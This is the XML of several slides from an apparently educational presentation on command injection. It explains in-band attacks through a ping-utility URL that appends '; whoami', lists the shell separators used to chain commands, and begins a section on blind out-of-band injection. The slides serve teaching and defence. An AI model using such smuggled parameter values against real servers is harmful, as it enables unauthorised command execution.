          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2196703"/>
            <a:ext cx="4885015" cy="4885015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239828" y="2168366"/>
            <a:ext cx="5936933" cy="425291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Visible Results: The "In-Band" Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239828" y="2820472"/>
            <a:ext cx="7604284" cy="1451610"/>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In-band attacks are the most straightforward form of command injection. The output of malicious commands is returned directly within the HTTP response, making results immediately visible to the attacker in the web page.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239828" y="4476155"/>
            <a:ext cx="7604284" cy="1088708"/>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This direct feedback makes in-band injections easier to detect and exploit, as attackers can see the results of their commands in real-time without requiring additional infrastructure.</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2818" y="506492"/>
            <a:ext cx="5316736" cy="574000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>In-Band Attack Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642818" y="1153954"/>
            <a:ext cx="3383637" cy="344329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Exploiting the Ping Utility</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="642818" y="1773674"/>
            <a:ext cx="918329" cy="1930241"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744742" y="1957268"/>
            <a:ext cx="2295763" cy="286941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Legitimate Request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744742" y="2450783"/>
            <a:ext cx="12242840" cy="569119"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1735574" y="2450783"/>
            <a:ext cx="12261175" cy="569119"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919168" y="2588419"/>
            <a:ext cx="11893987" cy="293846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>https://example.com/ping?ip=8.8.8.8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744742" y="3226475"/>
            <a:ext cx="12242840" cy="293846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Normal ping command executes safely, returning expected network diagnostics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="642818" y="3703915"/>
            <a:ext cx="918329" cy="1930241"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744742" y="3887510"/>
            <a:ext cx="2295763" cy="286941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Malicious Request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744742" y="4381024"/>
            <a:ext cx="12242840" cy="569119"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1735574" y="4381024"/>
            <a:ext cx="12261175" cy="569119"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919168" y="4518660"/>
            <a:ext cx="11893987" cy="293846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>https://example.com/ping?ip=8.8.8.8; whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744742" y="5156716"/>
            <a:ext cx="12242840" cy="293846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Attacker chains commands using semicolon separator</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="642818" y="5634157"/>
            <a:ext cx="918329" cy="1101923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744742" y="5817751"/>
            <a:ext cx="2295763" cy="286941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Visible Results</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744742" y="6214824"/>
            <a:ext cx="12242840" cy="301466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Page displays ping results followed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>www-data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>—the server's username revealed through command injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642818" y="6942653"/>
            <a:ext cx="13344763" cy="780336"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3531"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C3CFEF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Image 3" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="826413" y="7217092"/>
            <a:ext cx="229553" cy="183594"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1239560" y="7172087"/>
            <a:ext cx="12564428" cy="293846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Common Command Separators:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> &amp; ; || &amp;&amp; | – Each allows chaining multiple commands in Unix/Linux shells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8515" y="915829"/>
            <a:ext cx="7679769" cy="1307544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Type 2: Out-of-Band Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218515" y="2306955"/>
            <a:ext cx="5130998" cy="392311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3050"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Hidden Results: The "Blind" Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218515" y="3012996"/>
            <a:ext cx="7679769" cy="1004054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Blind or out-of-band attacks represent a more sophisticated injection technique. The application doesn't return command output in HTTP responses, forcing attackers to use alternative channels to confirm execution and exfiltrate data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218515" y="4252317"/>
            <a:ext cx="3735229" cy="1601033"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1960"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBFCFE"/>
          </a:solidFill>
          <a:ln w="22860">
            <a:solidFill>
              <a:srgbClr val="CFD2D8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
